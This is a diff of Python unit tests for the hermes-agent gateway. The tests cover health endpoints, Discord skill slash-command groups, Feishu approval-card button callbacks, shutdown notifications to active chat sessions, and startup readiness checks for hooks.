runner._notify_active_sessions_of_shutdown = (
GatewayRunner._notify_active_sessions_of_shutdown.__get__(runner, GatewayRunner)
)
runner._launch_detached_restart_command = GatewayRunner._launch_detached_restart_command.__get__(
runner, GatewayRunner
)
+53
View File
@@ -220,6 +220,7 @@ def _create_app(adapter: APIServerAdapter) -> web.Application:
app = web.Application(middlewares=mws)
app["api_server_adapter"] = adapter
app.router.add_get("/health", adapter._handle_health)
app.router.add_get("/health/detailed", adapter._handle_health_detailed)
app.router.add_get("/v1/health", adapter._handle_health)
app.router.add_get("/v1/models", adapter._handle_models)
app.router.add_post("/v1/chat/completions", adapter._handle_chat_completions)
@@ -277,6 +278,58 @@ class TestHealthEndpoint:
assert data["platform"] == "hermes-agent"
# ---------------------------------------------------------------------------
# /health/detailed endpoint
# ---------------------------------------------------------------------------
class TestHealthDetailedEndpoint:
@pytest.mark.asyncio
async def test_health_detailed_returns_ok(self, adapter):
"""GET /health/detailed returns status, platform, and runtime fields."""
app = _create_app(adapter)
with patch("gateway.status.read_runtime_status", return_value={
"gateway_state": "running",
"platforms": {"telegram": {"state": "connected"}},
"active_agents": 2,
"exit_reason": None,
"updated_at": "2026-04-14T00:00:00Z",
}):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
data = await resp.json()
assert data["status"] == "ok"
assert data["platform"] == "hermes-agent"
assert data["gateway_state"] == "running"
assert data["platforms"] == {"telegram": {"state": "connected"}}
assert data["active_agents"] == 2
assert isinstance(data["pid"], int)
assert "updated_at" in data
@pytest.mark.asyncio
async def test_health_detailed_no_runtime_status(self, adapter):
"""When gateway_state.json is missing, fields are None."""
app = _create_app(adapter)
with patch("gateway.status.read_runtime_status", return_value=None):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
data = await resp.json()
assert data["status"] == "ok"
assert data["gateway_state"] is None
assert data["platforms"] == {}
@pytest.mark.asyncio
async def test_health_detailed_does_not_require_auth(self, auth_adapter):
"""Health detailed endpoint should be accessible without auth, like /health."""
app = _create_app(auth_adapter)
with patch("gateway.status.read_runtime_status", return_value=None):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
# ---------------------------------------------------------------------------
# /v1/models endpoint
# ---------------------------------------------------------------------------
@@ -19,10 +19,34 @@ def _ensure_discord_mock():
discord_mod.Thread = type("Thread", (), {})
discord_mod.ForumChannel = type("ForumChannel", (), {})
discord_mod.Interaction = object
# Lightweight mock for app_commands.Group and Command used by
# _register_skill_group.
class _FakeGroup:
def __init__(self, *, name, description, parent=None):
self.name = name
self.description = description
self.parent = parent
self._children: dict[str, object] = {}
if parent is not None:
parent.add_command(self)
def add_command(self, cmd):
self._children[cmd.name] = cmd
class _FakeCommand:
def __init__(self, *, name, description, callback, parent=None):
self.name = name
self.description = description
self.callback = callback
self.parent = parent
discord_mod.app_commands = SimpleNamespace(
describe=lambda **kwargs: (lambda fn: fn),
choices=lambda **kwargs: (lambda fn: fn),
Choice=lambda **kwargs: SimpleNamespace(**kwargs),
Group=_FakeGroup,
Command=_FakeCommand,
)
ext_mod = MagicMock()
@@ -51,6 +75,12 @@ class FakeTree:
return decorator
def add_command(self, cmd):
self.commands[cmd.name] = cmd
def get_commands(self):
return [SimpleNamespace(name=n) for n in self.commands]
@pytest.fixture
def adapter():
@@ -498,3 +528,79 @@ def test_discord_auto_thread_config_bridge(monkeypatch, tmp_path):
import os
assert os.getenv("DISCORD_AUTO_THREAD") == "true"
# ------------------------------------------------------------------
# /skill group registration
# ------------------------------------------------------------------
def test_register_skill_group_creates_group(adapter):
"""_register_skill_group should register a '/skill' Group on the tree."""
mock_categories = {
"creative": [
("ascii-art", "Generate ASCII art", "/ascii-art"),
("excalidraw", "Hand-drawn diagrams", "/excalidraw"),
],
"media": [
("gif-search", "Search for GIFs", "/gif-search"),
],
}
mock_uncategorized = [
("dogfood", "Exploratory QA testing", "/dogfood"),
]
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=(mock_categories, mock_uncategorized, 0),
):
adapter._register_slash_commands()
tree = adapter._client.tree
assert "skill" in tree.commands, "Expected /skill group to be registered"
skill_group = tree.commands["skill"]
assert skill_group.name == "skill"
# Should have 2 category subgroups + 1 uncategorized subcommand
children = skill_group._children
assert "creative" in children
assert "media" in children
assert "dogfood" in children
# Category groups should have their skills
assert "ascii-art" in children["creative"]._children
assert "excalidraw" in children["creative"]._children
assert "gif-search" in children["media"]._children
def test_register_skill_group_empty_skills_no_group(adapter):
"""No /skill group should be added when there are zero skills."""
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=({}, [], 0),
):
adapter._register_slash_commands()
tree = adapter._client.tree
assert "skill" not in tree.commands
def test_register_skill_group_handler_dispatches_command(adapter):
"""Skill subcommand handlers should dispatch the correct /cmd-key text."""
mock_categories = {
"media": [
("gif-search", "Search for GIFs", "/gif-search"),
],
}
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=(mock_categories, [], 0),
):
adapter._register_slash_commands()
skill_group = adapter._client.tree.commands["skill"]
media_group = skill_group._children["media"]
gif_cmd = media_group._children["gif-search"]
assert gif_cmd.callback is not None
# The callback name should reflect the skill
assert "gif_search" in gif_cmd.callback.__name__
+143 -131
View File
@@ -1,12 +1,11 @@
"""Tests for Feishu interactive card approval buttons."""
import asyncio
import importlib.util
import json
import os
import sys
from pathlib import Path
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock, Mock, patch
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
@@ -23,14 +22,14 @@ if _repo not in sys.path:
# ---------------------------------------------------------------------------
def _ensure_feishu_mocks():
"""Provide stubs for lark-oapi / aiohttp.web so the import succeeds."""
if "lark_oapi" not in sys.modules:
if importlib.util.find_spec("lark_oapi") is None and "lark_oapi" not in sys.modules:
mod = MagicMock()
for name in (
"lark_oapi", "lark_oapi.api.im.v1",
"lark_oapi.event", "lark_oapi.event.callback_type",
):
sys.modules.setdefault(name, mod)
if "aiohttp" not in sys.modules:
if importlib.util.find_spec("aiohttp") is None and "aiohttp" not in sys.modules:
aio = MagicMock()
sys.modules.setdefault("aiohttp", aio)
sys.modules.setdefault("aiohttp.web", aio.web)
@@ -39,6 +38,7 @@ def _ensure_feishu_mocks():
_ensure_feishu_mocks()
from gateway.config import PlatformConfig
import gateway.platforms.feishu as feishu_module
from gateway.platforms.feishu import FeishuAdapter
@@ -74,6 +74,12 @@ def _make_card_action_data(
)
def _close_submitted_coro(coro, _loop):
"""Close scheduled coroutines in sync-handler tests to avoid unawaited warnings."""
coro.close()
return SimpleNamespace(add_done_callback=lambda *_args, **_kwargs: None)
# ===========================================================================
# send_exec_approval — interactive card with buttons
# ===========================================================================
@@ -203,14 +209,14 @@ class TestFeishuExecApproval:
# ===========================================================================
# _handle_card_action_event — approval button clicks
# _resolve_approval — approval state pop + gateway resolution
# ===========================================================================
class TestFeishuApprovalCallback:
"""Test the approval intercept in _handle_card_action_event."""
class TestResolveApproval:
"""Test _resolve_approval pops state and calls resolve_gateway_approval."""
@pytest.mark.asyncio
async def test_resolves_approval_on_click(self):
async def test_resolves_once(self):
adapter = _make_adapter()
adapter._approval_state[1] = {
"session_key": "agent:main:feishu:group:oc_12345",
@@ -218,28 +224,14 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_12345",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_once", "approval_id": 1},
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_user1", "user_name": "Norbert", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(1, "once", "Norbert")
mock_resolve.assert_called_once_with("agent:main:feishu:group:oc_12345", "once")
mock_update.assert_called_once_with("msg_001", "Approved once", "Norbert", "once")
# State should be cleaned up
assert 1 not in adapter._approval_state
@pytest.mark.asyncio
async def test_deny_button(self):
async def test_resolves_deny(self):
adapter = _make_adapter()
adapter._approval_state[2] = {
"session_key": "some-session",
@@ -247,26 +239,13 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_12345",
}
data = _make_card_action_data(
action_value={"hermes_action": "deny", "approval_id": 2},
token="tok_deny",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_alice", "user_name": "Alice", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(2, "deny", "Alice")
mock_resolve.assert_called_once_with("some-session", "deny")
mock_update.assert_called_once_with("msg_002", "Denied", "Alice", "deny")
@pytest.mark.asyncio
async def test_session_approval(self):
async def test_resolves_session(self):
adapter = _make_adapter()
adapter._approval_state[3] = {
"session_key": "sess-3",
@@ -274,26 +253,13 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_99",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_session", "approval_id": 3},
token="tok_ses",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_u", "user_name": "Bob", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(3, "session", "Bob")
mock_resolve.assert_called_once_with("sess-3", "session")
mock_update.assert_called_once_with("msg_003", "Approved for session", "Bob", "session")
@pytest.mark.asyncio
async def test_always_approval(self):
async def test_resolves_always(self):
adapter = _make_adapter()
adapter._approval_state[4] = {
"session_key": "sess-4",
@@ -301,42 +267,29 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_55",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_always", "approval_id": 4},
token="tok_alw",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_u", "user_name": "Carol", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock),
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(4, "always", "Carol")
mock_resolve.assert_called_once_with("sess-4", "always")
@pytest.mark.asyncio
async def test_already_resolved_drops_silently(self):
adapter = _make_adapter()
# No state for approval_id 99 — already resolved
data = _make_card_action_data(
action_value={"hermes_action": "approve_once", "approval_id": 99},
token="tok_gone",
)
with patch("tools.approval.resolve_gateway_approval") as mock_resolve:
await adapter._handle_card_action_event(data)
await adapter._resolve_approval(99, "once", "Nobody")
# Should NOT resolve — already handled
mock_resolve.assert_not_called()
# ===========================================================================
# _handle_card_action_event — non-approval card actions
# ===========================================================================
class TestNonApprovalCardAction:
"""Non-approval card actions should still route as synthetic commands."""
@pytest.mark.asyncio
async def test_non_approval_actions_route_normally(self):
"""Non-approval card actions should still become synthetic commands."""
async def test_routes_as_synthetic_command(self):
adapter = _make_adapter()
data = _make_card_action_data(
@@ -351,82 +304,141 @@ class TestFeishuApprovalCallback:
),
patch.object(adapter, "get_chat_info", new_callable=AsyncMock, return_value={"name": "Test Chat"}),
patch.object(adapter, "_handle_message_with_guards", new_callable=AsyncMock) as mock_handle,
patch("tools.approval.resolve_gateway_approval") as mock_resolve,
):
await adapter._handle_card_action_event(data)
# Should NOT resolve any approval
mock_resolve.assert_not_called()
# Should have routed as synthetic command
mock_handle.assert_called_once()
event = mock_handle.call_args[0][0]
assert "/card button" in event.text
# ===========================================================================
# _update_approval_card — card replacement after resolution
# _on_card_action_trigger — inline card response for approval actions
# ===========================================================================
class TestFeishuUpdateApprovalCard:
"""Test the card update after approval resolution."""
class _FakeCallBackCard:
def __init__(self):
self.type = None
self.data = None
@pytest.mark.asyncio
async def test_updates_card_on_approve(self):
class _FakeP2Response:
def __init__(self):
self.card = None
@pytest.fixture(autouse=False)
def _patch_callback_card_types(monkeypatch):
"""Provide real-ish P2CardActionTriggerResponse / CallBackCard for tests."""
monkeypatch.setattr(feishu_module, "P2CardActionTriggerResponse", _FakeP2Response)
monkeypatch.setattr(feishu_module, "CallBackCard", _FakeCallBackCard)
class TestCardActionCallbackResponse:
"""Test that _on_card_action_trigger returns updated card inline."""
def test_drops_action_when_loop_not_ready(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = None
data = _make_card_action_data({"hermes_action": "approve_once", "approval_id": 1})
mock_update = AsyncMock()
adapter._client.im.v1.message.update = MagicMock()
with patch("asyncio.run_coroutine_threadsafe") as mock_submit:
response = adapter._on_card_action_trigger(data)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_001", "Approved once", "Norbert", "once"
)
assert response is not None
assert response.card is None
mock_submit.assert_not_called()
mock_thread.assert_called_once()
# Verify the update request was built
call_args = mock_thread.call_args
assert call_args[0][0] == adapter._client.im.v1.message.update
@pytest.mark.asyncio
async def test_updates_card_on_deny(self):
def test_returns_card_for_approve_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_once", "approval_id": 1},
open_id="ou_bob",
)
adapter._sender_name_cache["ou_bob"] = ("Bob", 9999999999)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_002", "Denied", "Alice", "deny"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
mock_thread.assert_called_once()
assert response is not None
assert response.card is not None
assert response.card.type == "raw"
card = response.card.data
assert card["header"]["template"] == "green"
assert "Approved once" in card["header"]["title"]["content"]
assert "Bob" in card["elements"][0]["content"]
@pytest.mark.asyncio
async def test_skips_update_when_not_connected(self):
def test_returns_card_for_deny_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._client = None
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "deny", "approval_id": 2},
)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_001", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
mock_thread.assert_not_called()
assert response.card is not None
card = response.card.data
assert card["header"]["template"] == "red"
assert "Denied" in card["header"]["title"]["content"]
@pytest.mark.asyncio
async def test_skips_update_when_no_message_id(self):
def test_ignores_missing_approval_id(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data({"hermes_action": "approve_once"})
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe") as mock_submit:
response = adapter._on_card_action_trigger(data)
mock_thread.assert_not_called()
assert response is not None
assert response.card is None
mock_submit.assert_not_called()
@pytest.mark.asyncio
async def test_swallows_update_errors(self):
def test_no_card_for_non_approval_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data({"some_other": "value"})
with patch("asyncio.to_thread", new_callable=AsyncMock, side_effect=Exception("API error")):
# Should not raise
await adapter._update_approval_card(
"msg_001", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
assert response is not None
assert response.card is None
def test_falls_back_to_open_id_when_name_not_cached(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_session", "approval_id": 3},
open_id="ou_unknown",
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
card = response.card.data
assert "ou_unknown" in card["elements"][0]["content"]
def test_ignores_expired_cached_name(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_once", "approval_id": 4},
open_id="ou_expired",
)
adapter._sender_name_cache["ou_expired"] = ("Old Name", 1)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
card = response.card.data
assert "Old Name" not in card["elements"][0]["content"]
assert "ou_expired" in card["elements"][0]["content"]
+19
View File
@@ -125,6 +125,25 @@ async def test_gateway_stop_service_restart_sets_named_exit_code():
assert runner._exit_code == GATEWAY_SERVICE_RESTART_EXIT_CODE
@pytest.mark.asyncio
async def test_gateway_stop_emits_shutdown_hook_after_drain(monkeypatch):
runner, adapter = make_restart_runner()
adapter.disconnect = AsyncMock()
runner.hooks.emit = AsyncMock()
with patch("gateway.status.remove_pid_file"), patch("gateway.status.write_runtime_status"):
await runner.stop(restart=True, service_restart=True)
runner.hooks.emit.assert_awaited_once_with(
"gateway:shutdown",
{
"restart": True,
"service_restart": True,
"detached_restart": False,
},
)
@pytest.mark.asyncio
async def test_drain_active_agents_throttles_status_updates():
runner, _adapter = make_restart_runner()
+20 -1
View File
@@ -9,7 +9,7 @@ import pytest
from gateway.hooks import HookRegistry
def _create_hook(hooks_dir, hook_name, events, handler_code):
def _create_hook(hooks_dir, hook_name, events, handler_code, *, manifest_extra=""):
"""Helper to create a hook directory with HOOK.yaml and handler.py."""
hook_dir = hooks_dir / hook_name
hook_dir.mkdir(parents=True)
@@ -17,6 +17,7 @@ def _create_hook(hooks_dir, hook_name, events, handler_code):
f"name: {hook_name}\n"
f"description: Test hook\n"
f"events: {events}\n"
f"{manifest_extra}"
)
(hook_dir / "handler.py").write_text(handler_code)
return hook_dir
@@ -112,6 +113,24 @@ class TestDiscoverAndLoad:
assert len(reg.loaded_hooks) == 2
def test_preserves_optional_startup_readiness_metadata(self, tmp_path):
_create_hook(
tmp_path,
"ready-hook",
'["gateway:startup"]',
"def handle(e, c): pass\n",
manifest_extra="startup_readiness:\n id: beam-runtime\n required: false\n",
)
reg = HookRegistry()
with patch("gateway.hooks.HOOKS_DIR", tmp_path), _patch_no_builtins(reg):
reg.discover_and_load()
assert reg.loaded_hooks[0]["startup_readiness"] == {
"id": "beam-runtime",
"required": False,
}
class TestEmit:
@pytest.mark.asyncio
+81
View File
@@ -161,3 +161,84 @@ async def test_launch_detached_restart_command_uses_setsid(monkeypatch):
assert kwargs["start_new_session"] is True
assert kwargs["stdout"] is subprocess.DEVNULL
assert kwargs["stderr"] is subprocess.DEVNULL
# ── Shutdown notification tests ──────────────────────────────────────
@pytest.mark.asyncio
async def test_shutdown_notification_sent_to_active_sessions():
"""Active sessions receive a notification when the gateway starts shutting down."""
runner, adapter = make_restart_runner()
source = make_restart_source(chat_id="999", chat_type="dm")
session_key = f"agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
assert "shutting down" in adapter.sent[0]
assert "interrupted" in adapter.sent[0]
@pytest.mark.asyncio
async def test_shutdown_notification_says_restarting_when_restart_requested():
"""When _restart_requested is True, the message says 'restarting' and mentions /retry."""
runner, adapter = make_restart_runner()
runner._restart_requested = True
session_key = "agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
assert "restarting" in adapter.sent[0]
assert "/retry" in adapter.sent[0]
@pytest.mark.asyncio
async def test_shutdown_notification_deduplicates_per_chat():
"""Multiple sessions in the same chat only get one notification."""
runner, adapter = make_restart_runner()
# Two sessions (different users) in the same chat
runner._running_agents["agent:main:telegram:group:chat1:u1"] = MagicMock()
runner._running_agents["agent:main:telegram:group:chat1:u2"] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
@pytest.mark.asyncio
async def test_shutdown_notification_skipped_when_no_active_agents():
"""No notification is sent when there are no active agents."""
runner, adapter = make_restart_runner()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 0
@pytest.mark.asyncio
async def test_shutdown_notification_ignores_pending_sentinels():
"""Pending sentinels (not-yet-started agents) don't trigger notifications."""
from gateway.run import _AGENT_PENDING_SENTINEL
runner, adapter = make_restart_runner()
runner._running_agents["agent:main:telegram:dm:999"] = _AGENT_PENDING_SENTINEL
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 0
@pytest.mark.asyncio
async def test_shutdown_notification_send_failure_does_not_block():
"""If sending a notification fails, the method still completes."""
runner, adapter = make_restart_runner()
adapter.send = AsyncMock(side_effect=Exception("network error"))
session_key = "agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
# Should not raise
await runner._notify_active_sessions_of_shutdown()
@@ -132,6 +132,68 @@ async def test_runner_records_connected_platform_state_on_success(monkeypatch, t
assert state["platforms"]["discord"]["error_message"] is None
@pytest.mark.asyncio
async def test_runner_discovers_plugins_before_loading_hooks(monkeypatch, tmp_path):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
config = GatewayConfig(
platforms={
Platform.DISCORD: PlatformConfig(enabled=True, token="***")
},
sessions_dir=tmp_path / "sessions",
)
runner = GatewayRunner(config)
order: list[str] = []
monkeypatch.setattr(runner, "_create_adapter", lambda platform, platform_config: _SuccessfulAdapter())
monkeypatch.setattr("hermes_cli.plugins.discover_plugins", lambda: order.append("plugins"))
monkeypatch.setattr(runner.hooks, "discover_and_load", lambda: order.append("hooks"))
monkeypatch.setattr(runner.hooks, "emit", AsyncMock())
ok = await runner.start()
assert ok is True
assert order == ["plugins", "hooks"]
@pytest.mark.asyncio
async def test_runner_initializes_startup_checks_before_gateway_startup_emit(monkeypatch, tmp_path):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
config = GatewayConfig(
platforms={
Platform.DISCORD: PlatformConfig(enabled=True, token="***")
},
sessions_dir=tmp_path / "sessions",
)
runner = GatewayRunner(config)
runner.hooks._loaded_hooks = [
{
"name": "beam-runtime",
"events": ["gateway:startup"],
"path": str(tmp_path / "hook"),
"startup_readiness": {
"id": "beam-runtime",
"required": True,
},
}
]
monkeypatch.setattr(runner, "_create_adapter", lambda platform, platform_config: _SuccessfulAdapter())
monkeypatch.setattr("hermes_cli.plugins.discover_plugins", lambda: None)
monkeypatch.setattr(runner.hooks, "discover_and_load", lambda: None)
async def _assert_checks(event_type, context):
state = read_runtime_status()
assert event_type == "gateway:startup"
assert state["startup_checks"]["beam-runtime"]["state"] == "pending"
assert state["startup_checks"]["beam-runtime"]["required"] is True
monkeypatch.setattr(runner.hooks, "emit", _assert_checks)
ok = await runner.start()
assert ok is True
@pytest.mark.asyncio
async def test_start_gateway_verbosity_imports_redacting_formatter(monkeypatch, tmp_path):
"""Verbosity != None must not crash with NameError on RedactingFormatter (#8044)."""
+66
View File
@@ -132,6 +132,72 @@ class TestGatewayRuntimeStatus:
assert payload["platforms"]["discord"]["error_code"] is None
assert payload["platforms"]["discord"]["error_message"] is None
def test_reset_startup_checks_replaces_previous_run_entries(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.write_runtime_status(
gateway_state="running",
startup_checks={
"old-check": {
"state": "ready",
"required": True,
"source": "old-hook",
"detail": None,
}
},
)
status.reset_startup_checks([
{
"name": "new-hook",
"startup_readiness": {
"id": "new-check",
"required": False,
},
}
])
payload = status.read_runtime_status()
assert set(payload["startup_checks"]) == {"new-check"}
assert payload["startup_checks"]["new-check"]["state"] == "pending"
assert payload["startup_checks"]["new-check"]["required"] is False
assert payload["startup_checks"]["new-check"]["source"] == "new-hook"
def test_mark_startup_check_ready_persists_detail(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.reset_startup_checks([
{
"name": "beam",
"startup_readiness": {
"id": "beam-runtime",
"required": True,
},
}
])
status.mark_startup_check_ready("beam-runtime", detail="ready for RPC")
payload = status.read_runtime_status()
assert payload["startup_checks"]["beam-runtime"]["state"] == "ready"
assert payload["startup_checks"]["beam-runtime"]["detail"] == "ready for RPC"
def test_mark_startup_check_failed_creates_missing_entry(self, tmp_path, monkeypatch):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
status.mark_startup_check_failed(
"late-hook",
detail="startup hook crashed",
required=False,
source="late-hook",
)
payload = status.read_runtime_status()
assert payload["startup_checks"]["late-hook"]["state"] == "failed"
assert payload["startup_checks"]["late-hook"]["required"] is False
assert payload["startup_checks"]["late-hook"]["source"] == "late-hook"
assert payload["startup_checks"]["late-hook"]["detail"] == "startup hook crashed"
class TestTerminatePid:
def test_force_uses_taskkill_on_windows(self, monkeypatch):
+151
View File
@@ -1028,3 +1028,154 @@ class TestDiscordSkillCommands:
assert len(name) <= _CMD_NAME_LIMIT, (
f"Name '{name}' is {len(name)} chars (limit {_CMD_NAME_LIMIT})"
)
# ---------------------------------------------------------------------------
# Discord skill commands grouped by category
# ---------------------------------------------------------------------------
from hermes_cli.commands import discord_skill_commands_by_category # noqa: E402
class TestDiscordSkillCommandsByCategory:
"""Tests for discord_skill_commands_by_category() — /skill group registration."""
def test_groups_skills_by_category(self, tmp_path, monkeypatch):
"""Skills nested 2+ levels deep should be grouped by top-level category."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
# Create the directory structure so resolve() works
for p in [
"skills/creative/ascii-art",
"skills/creative/excalidraw",
"skills/media/gif-search",
]:
(tmp_path / p).mkdir(parents=True, exist_ok=True)
(tmp_path / p / "SKILL.md").write_text("---\nname: test\n---\n")
fake_cmds = {
"/ascii-art": {
"name": "ascii-art",
"description": "Generate ASCII art",
"skill_md_path": f"{fake_skills_dir}/creative/ascii-art/SKILL.md",
},
"/excalidraw": {
"name": "excalidraw",
"description": "Hand-drawn diagrams",
"skill_md_path": f"{fake_skills_dir}/creative/excalidraw/SKILL.md",
},
"/gif-search": {
"name": "gif-search",
"description": "Search for GIFs",
"skill_md_path": f"{fake_skills_dir}/media/gif-search/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert "creative" in categories
assert "media" in categories
assert len(categories["creative"]) == 2
assert len(categories["media"]) == 1
assert uncategorized == []
assert hidden == 0
def test_root_level_skills_are_uncategorized(self, tmp_path, monkeypatch):
"""Skills directly under SKILLS_DIR (only 1 path component) → uncategorized."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / "dogfood").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "dogfood" / "SKILL.md").write_text("")
fake_cmds = {
"/dogfood": {
"name": "dogfood",
"description": "QA testing",
"skill_md_path": f"{fake_skills_dir}/dogfood/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert categories == {}
assert len(uncategorized) == 1
assert uncategorized[0][0] == "dogfood"
def test_hub_skills_excluded(self, tmp_path, monkeypatch):
"""Skills under .hub should be excluded."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / ".hub" / "some-skill").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / ".hub" / "some-skill" / "SKILL.md").write_text("")
fake_cmds = {
"/some-skill": {
"name": "some-skill",
"description": "Hub skill",
"skill_md_path": f"{fake_skills_dir}/.hub/some-skill/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
assert categories == {}
assert uncategorized == []
def test_deep_nested_skills_use_top_category(self, tmp_path, monkeypatch):
"""Skills like mlops/training/axolotl should group under 'mlops'."""
from unittest.mock import patch
fake_skills_dir = str(tmp_path / "skills")
(tmp_path / "skills" / "mlops" / "training" / "axolotl").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "mlops" / "training" / "axolotl" / "SKILL.md").write_text("")
(tmp_path / "skills" / "mlops" / "inference" / "vllm").mkdir(parents=True, exist_ok=True)
(tmp_path / "skills" / "mlops" / "inference" / "vllm" / "SKILL.md").write_text("")
fake_cmds = {
"/axolotl": {
"name": "axolotl",
"description": "Fine-tuning with Axolotl",
"skill_md_path": f"{fake_skills_dir}/mlops/training/axolotl/SKILL.md",
},
"/vllm": {
"name": "vllm",
"description": "vLLM inference",
"skill_md_path": f"{fake_skills_dir}/mlops/inference/vllm/SKILL.md",
},
}
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
with (
